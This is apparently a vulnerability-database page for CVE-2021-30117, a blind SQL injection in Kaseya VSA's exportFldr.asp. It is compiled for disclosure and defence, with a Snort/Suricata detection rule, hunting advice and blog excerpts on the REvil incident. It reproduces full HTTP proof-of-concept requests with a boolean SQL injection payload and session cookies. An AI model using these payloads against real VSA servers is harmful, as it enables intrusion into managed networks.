CVE-2021-30117
published 2021-07-09CVE-2021-30117: The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description…
PriorityP271high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
72.05%
99.4th percentile
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: ``` GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 Whoops. ----SNIP---- ``` However when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed. Request: ``` GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; ``` Response: ``` HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transp
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kaseya | vsa | < 9.5.6 | 9.5.6 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)"; flow:established,to_server; http.uri; content:"/InstallTab/exportFldr.asp?"; fast_pattern; content:"fldrId|3d|"; pcre:"/^[^&]*?(?:(?:S(?:HOW\x20(?:C(?:UR(?:DAT|TIM)E|HARACTER\x20SET)|(?:VARI|T)ABLES)|ELECT\x20(?:FROM|USER|SLEEP))|U(?:NION\x20SELEC|PDATE\x20SE)T|DELETE\x20FROM|INSERT\x20INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\x2f\*.+\*\x2f)/Ri"; reference:url,csirt.divd.nl/cves/CVE-2021-30117/; reference:cve,2021-30117; classtype:web-application-attack; sid:2065485; rev:1; metadata:affected_product Kaseya_VSA, attack_target Server, tls_state TLSDecrypt, created_at 2025_10_27, cve CVE_2021_30117, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2025_10_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Exploitation is semi-authenticated: a valid sessionId cookie (obtainable via CVE-2021-30116 credential leak) is required. Correlate detections for CVE-2021-30116 sessionId harvesting with subsequent requests to /InstallTab/exportFldr.asp. ↗
- →Monitor for SQL keywords (SELECT, UNION, CASE, WHEN, FROM, SLEEP, INSERT, DELETE, UPDATE) URL-encoded or plaintext in the fldrId query parameter of requests to /InstallTab/exportFldr.asp.
- →Agent GUIDs can be retrieved from the local registry of a compromised host running a VSA agent and used for authentication bypass via /dl.asp. Hunt for registry reads of the VSA agent GUID key on endpoints. ↗
- →The Snort/ET rule (sid:2065485) should be deployed at both perimeter and internal sensors with TLS inspection enabled (tls_state TLSDecrypt) to catch encrypted exploitation attempts.
- ·Exploitation requires a valid sessionId cookie, which must first be obtained via CVE-2021-30116 (credentials leak / business logic flaw). This CVE alone is not exploitable without that prerequisite session token. ↗
- ·Kaseya's SaaS VSA platform was stated to not be vulnerable to the exploited vulnerabilities; only on-premises VSA servers are affected. ↗
- ·The ET Snort rule requires TLS decryption to be effective against HTTPS-protected VSA deployments.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No advisories linked to this vulnerability.
Suricata
ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)
suricata·2025-10-27·CVSS 9.8
CVE-2021-30117 [CRITICAL] ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)
ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Kaseya VSA Authenticated SQL Injection in exportFldr (CVE-2021-30117)"; flow:established,to_server; http.uri; content:"/InstallTab/exportFldr.asp?"; fast_pattern; content:"fldrId|3d|"; pcre:"/^[^&]*?(?:(?:S(?:HOW\x20(?:C(?:UR(?:DAT|TIM)E|HARACTER\x20SET)|(?:VARI|T)ABLES)|ELECT\x20(?:FROM|USER|SLEEP))|U(?:NION\x20SELEC|PDATE\x20SE)T|DELETE\x20FROM|INSERT\x20INTO)|S(?:HOW.+(?:C(?:HARACTER.+SET|UR(DATE|TIME))|(?:VARI|T)ABLES)|ELECT.+(?:FROM|USER))|U(?:NION.+SELEC|PDATE.+SE)T|DELETE.+FROM|INSERT.+INTO|\x2f\*.+\*\x2f)/Ri"; reference:url,csirt.divd.nl/cves/CVE-2021-30117/; reference:cve,2021-30117; classtype:web-application-attack; sid:2
No public exploits indexed.
Huntress
The Hunt to Find Origins of Kaseya's VSA Mass Ransomware Incident | Huntress
blogs_huntress·2021-07-20
The Hunt to Find Origins of Kaseya's VSA Mass Ransomware Incident | Huntress
Kaseya has a customer base of roughly 35,000 businesses and organizations. These consist of approximately 17,000 managed service providers, 18,000 direct/VAR customers and a significant number of end users at the organizations they support. There is certainly a large attack surface offered to threat actors who might compromise the Kaseya VSA software.
In the recent ransomware incident that occurred in July 2021, the industry learned that 50-60 MSPs and their managed customers were encrypted by the REvil ransomware gang through the Kaseya VSA remote monitoring and management software.
With just 50-60 MSPs affected out of a potential 17,000 or 35,000, that leaves us with a large lingering question… “ Why weren’t there more victims?”
That is to say, in a more pointed manner, “Shouldn’t the
Tenable
CVE-2021-30116: Multiple Zero-Day Vulnerabilities in Kaseya VSA Exploited to Distribute REvil Ransomware
blogs_tenable·2021-07-06·CVSS 10.0
[CRITICAL] CVE-2021-30116: Multiple Zero-Day Vulnerabilities in Kaseya VSA Exploited to Distribute REvil Ransomware
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Huntress
The Hunt to Find Origins of Kaseya's VSA Mass Ransomware Incident | Huntress
blogs_huntress
The Hunt to Find Origins of Kaseya's VSA Mass Ransomware Incident | Huntress
Kaseya has a customer base of roughly 35,000 businesses and organizations. These consist of approximately 17,000 managed service providers, 18,000 direct/VAR customers and a significant number of end users at the organizations they support. There is certainly a large attack surface offered to threat actors who might compromise the Kaseya VSA software.
In the recent ransomware incident that occurred in July 2021, the industry learned that 50-60 MSPs and their managed customers were encrypted by the REvil ransomware gang through the Kaseya VSA remote monitoring and management software.
With just 50-60 MSPs affected out of a potential 17,000 or 35,000, that leaves us with a large lingering question… “Why weren’t there more victims?”
That is to say, in a more pointed manner, “Shouldn’t ther
https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021
2021-07-09
Published